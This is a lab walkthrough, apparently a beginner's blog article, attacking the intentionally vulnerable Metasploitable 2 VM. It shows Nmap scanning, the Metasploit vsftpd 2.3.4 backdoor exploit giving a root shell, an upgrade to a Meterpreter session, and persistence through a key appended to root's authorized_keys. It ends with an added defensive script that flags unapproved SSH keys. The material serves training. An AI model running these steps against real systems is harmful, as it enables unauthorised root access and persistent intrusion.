
Vsftpd 2.3.4 Exploitation — Metasploitable 2

Topics covered

- Enumeration using Nmap
- Getting shell access
- Converting a normal shell to Meterpreter
- Persistent access

Hi guys, I’m Rohan Patil, and this is my first article on penetration testing. You can download Metasploitable 2 from here. I am glad to have a mentor like Vishal Waghmare (Medium link).

I have downloaded and configured Metasploitable 2 on my system. You can get more information about Metasploitable here.

Let's start…

To get the IP, I used:

netdiscover

After getting the IP, I ran the following Nmap command to identify the services and ports configured on the victim machine and to save the information in the file abc.xml.

nmap -sS 192.168.0.111 -v -p 1-65535 -sV -O -oX abc.xml

The Nmap output for the victim machine shows the port numbers, the current state of the services, the names of the services, the versions of the services, and the OS details at the bottom.

I searched for the VSFTPD 2.3.4 exploit on exploit-db.com and found the backdoor command execution exploit.

To run the backdoor command execution exploit, I started msfconsole:

msfconsole -q

In msfconsole, I searched for “vsftpd” with the command:

search vsftpd

To select the search result, I used the command “use 0”; 0 stands for the exploit number that msf shows in the search results. I also asked it to show the available options.

use 0

As we can see, rhosts is blank, which means we have to set rhosts to execute the exploit. Rhosts is the receiving host (the victim machine's IP address).

set rhosts 192.168.0.111

Run the exploit with “run”. The exploit executed successfully, as we got a shell.

run

Our exploit executed successfully, and we have got ROOT access.

Now let's convert the normal shell access to Meterpreter. To do so, we have to send the shell to run in the background:

background

Let's search for Meterpreter:

search shell_to

Now we are going to repeat the commands we used for vsftpd.

options

set Lhost 192.168.0.100

set session 1

run

After setting up Meterpreter, we list the sessions. There should be 2 sessions running.

show sessions

To use a session, we use the command “sessions 1” or “sessions 2”:

sessions 2

I am using 2 as I want to use the Meterpreter access. The “help” command will show you the commands we can execute on the victim machine.

To have long-term access, I am inserting an SSH key into the victim machine so that I can get SSH access without running msfconsole.

First I will generate an SSH public key for my login. Then I am going to copy it so I can insert it into the victim machine.

ssh-keygen

cat /home/spider/.ssh/id_rsa.pub

In the shell, we go to the .ssh folder with the command:

cd /root/.ssh

and edit the file authorized_keys:

echo -e "ssh key" >> authorized_keys

Now check the access with the command:

ssh root@192.168.0.111
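
As an added defender-side example (not part of the original article), the Python script below audits an authorized_keys file against an allowlist of approved key fingerprints, which is how a key inserted as described above would be caught. The sample file, the key blobs, and names such as admin@mgmt and spider@kali are constructed for illustration; the blobs are not real SSH keys.

```python
import base64
import hashlib

# Tokens that can start the key-type field of an authorized_keys line.
KEY_TYPES = ("ssh-rsa", "ssh-ed25519", "ssh-dss", "ecdsa-sha2-", "sk-")


def fingerprint(blob_b64):
    """Return the OpenSSH-style SHA256 fingerprint of a base64 key blob."""
    digest = hashlib.sha256(base64.b64decode(blob_b64, validate=True)).digest()
    return "SHA256:" + base64.b64encode(digest).decode().rstrip("=")


def parse_keys(text):
    """Yield (line_no, key_type, fingerprint, comment) for each key line."""
    for line_no, line in enumerate(text.splitlines(), 1):
        fields = line.split()
        if not fields or fields[0].startswith("#"):
            continue  # blank line or comment
        # A line may begin with an options field (e.g. no-pty,command="...").
        idx = next((i for i, f in enumerate(fields) if f.startswith(KEY_TYPES)), None)
        if idx is None or idx + 1 >= len(fields):
            continue  # no recognisable key on this line
        try:
            fp = fingerprint(fields[idx + 1])
        except ValueError:  # invalid base64: never matches the allowlist
            fp = "UNPARSEABLE"
        yield line_no, fields[idx], fp, " ".join(fields[idx + 2:])


def audit(text, approved):
    """Return the key entries whose fingerprint is not in the approved set."""
    return [entry for entry in parse_keys(text) if entry[2] not in approved]


# Constructed sample data: placeholder blobs, not real public keys.
ADMIN_BLOB = base64.b64encode(b"constructed admin key blob").decode()
EXTRA_BLOB = base64.b64encode(b"constructed unexpected key blob").decode()
SAMPLE = f"""# constructed /root/.ssh/authorized_keys
ssh-rsa {ADMIN_BLOB} admin@mgmt
no-pty,command="/usr/bin/uptime" ssh-ed25519 {ADMIN_BLOB} monitor@mgmt

ssh-rsa {EXTRA_BLOB} spider@kali
"""

if __name__ == "__main__":
    for line_no, ktype, fp, comment in audit(SAMPLE, {fingerprint(ADMIN_BLOB)}):
        print(f"line {line_no}: unapproved {ktype} key {fp} ({comment})")
```

On a real host, pass the contents of each account's authorized_keys file to audit() together with the fingerprints your team has approved, and investigate every entry it returns.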
